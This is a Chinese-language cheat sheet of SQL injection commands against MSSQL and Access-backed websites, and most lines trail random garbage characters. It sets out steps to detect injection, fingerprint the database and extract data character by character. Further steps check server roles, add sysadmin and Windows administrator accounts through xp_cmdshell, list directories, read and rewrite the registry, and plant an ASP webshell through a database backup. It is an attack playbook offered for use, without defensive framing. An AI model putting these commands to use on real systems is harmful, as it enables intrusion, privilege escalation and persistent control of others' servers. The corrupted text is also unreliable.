1.判断是否有注入;and 1=1 ;and 1=2 k7�JE{�(Ok
2.初步判断是否是mssql ;and user>0 q1yb�Jii��
"%fh`4y3\
3.注入参数是字符'and [查询条件] and ''=' gY�\���X?�
�u3� �k%��
4.搜索时没过滤参数的'and [查询条件] and '%25'=' <k�n�f^D<"
$/;D8P5/&=
5.判断数据库系统 �nZZ�N�x�
JP�QWR�K�^
;and (select count(*) from sysobjects)>0 mssql ,Y �*unk<S
f�%vJmp��g
;and (select count(*) from msysobjects)>0 access G1�65grGFd
yUV0{A-q{0
zh`!x{Z�?^
fy+fJ )4sj
6.猜数据库 ;and (select Count(*) from [数据库名])>0 md�jPK�rF<
e��ewh�T�^
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 {gh4�1G;�n
AsF�n%�8_I
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 _CqVH5U?��
_8t5r����F
9.(1)猜字段的ascii值(access) �I5]=\k(�$
1o"/5�T:S[
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 K$v
S�dpC�
r�Ez-\jLD~
(2)猜字段的ascii值(mssql) +8qtFog$\g
o6�`4y^Q{/
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 'a.�n�����
%Aa�f86pkp
10.测试权限结构(mssql) ;fom�c<���
.EeX�q�}a[
�U%%f�KL=S
"Tw4'�AY'P
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- EmrUzaG��D
od~^''/b��
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- (��Z�:(f~;
1Q_� ��� C
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ?88k`T'EI�
X�3[gi��`
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ��W�\]bh'(
;R[ �� xo!
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 1 ���&�G0;
��|�OW/-&)
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- =�&�+]>g{T
3��37��y,;
;and 1=(select IS_MEMBER('db_owner'));-- eC%�uu����
=�5:�L#` .
B
~u9"SR.�
$t*���>A+J
11.添加mssql和系统的帐户 �|-�Rg�].�
=$�bJ�`GpJ
;exec master.dbo.sp_addlogin username;-- G�JZGHUB=>
;exec master.dbo.sp_password null,username,password;-- PJd7t%��m;
P���dgn9
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �3a9%djGq�
�5�)712b(&
;exec master.dbo.xp_cmdshell 'net user username password rP4v_?Zg�+
vW�6
a=j8�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- =^liong0��
lMkDLobos
;exec master.dbo.xp_cmdshell 'net user username password /add';-- .CJQ]ECl7p
X�a�e0x��s
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- d)@Hx�8���
��]���5(T{
_��#[~?g�`
SCwAA�E9s]
12.(1)遍历目录 RF3?q6j ,
p�y����p�W
;create table dirs(paths varchar(100), id int) g�u���t[�q
i4<&zj�}�)
;insert dirs exec master.dbo.xp_dirtree 'c:\' -,�x�CUG<g
��:Y? �L*�
;and (select top 1 paths from dirs)>0 ;8�F|Q<`pV
/zt�9;^��e
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 4%!��#=JCl
(<M^C>pldf
?�yAp&�Ad�
+�65�OR'�d
(2)遍历目录 )1�C�Ys4lp
nsT�]Yxo%M
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 6yDj1���PI
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �,m4M39MWJ
�Q1�o�x<-�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 '�5^�$v{��
$g�hA��C��
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 V[9#+l��~#
* SAYl�i+@
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 bx�!��uHL=
�4�V���v~
\R"�}��=7�
'K|Jg�.2��
13.mssql中的存储过程 ��k8>(-W"A
}s*H|���z�
xp_regenumvalues 注册表根键, 子键 VSm[80iR�0
01�N]��|F:
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 a#��i85su�
^pI&�f{q��
xp_regread 根键,子键,键值名 ��I�w07P�2
�@B.;V=8wJ
;exec xp_regread Tbf@qid �e
8(AI|"A"-�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �|�aAu�4 �
oA��n�Ndo
xp_regwrite 根键,子键, 值名, 值类型, 值 gK���&MdF*
�FI.A�e/(U
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Z�>�89�7>�
B: �'}S�A{
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 6CQ.>�M:�R
�$5(�_��U�
xp_regdeletevalue 根键,子键,值名 �-|1H-[Y(
w@K4u�{|��
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 W|~Jl7hs8Q
#���=}d�v8
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �=O�~ ��J�
sObH#/��l`
M��� lv���
��K�OQiX?'
14.mssql的backup创建webshell Z.Otci�>�J
R1!F� mZW8
use model C]X:@^H�y�
"7�w�~�0?}
create table cmd(str image); jw�P}{mi*�
;q=0NtCS=4
insert into cmd(str) values (''); q�+j.��)�e
g]fds�Z��v
backup database model to disk='c:\l.asp'; �"�ITC P<+
AD$$S.zoD<
`5HFRgL`.�
0n� FEP�MO
15.mssql内置函数 �^Vbx9UN/
!b !C+ �\v
;and (select @@version)>0 获得Windows的版本号 ��qcNu9Ih
xg��dS]S�z
;and user_name()='dbo' 判断当前系统的连接用户是不是sa i146@<\G{P
k��n�X*fp�
;and (select user_name())>0 爆当前系统的连接用户 \t��p�J �
fX:)mLnO�/
;and (select db_name())>0 得到当前连接的数据库 mYU7b8x�_�
v?BVUH>#�9
J
8!D."'Q0
4�t C-msTf
16.简洁的webshell �A�-=B#U�F
`.M�Y�"�g9
use model �/m�i9��q�
\2UtT�@3|C
create table cmd(str image); r�>>4)<C7J
U~;Rzoe)q*
insert into cmd(str) values (''); 0Q>y�v;�M
f���*Xum[
backup database model to disk='g:\wwwtest\l.asp';
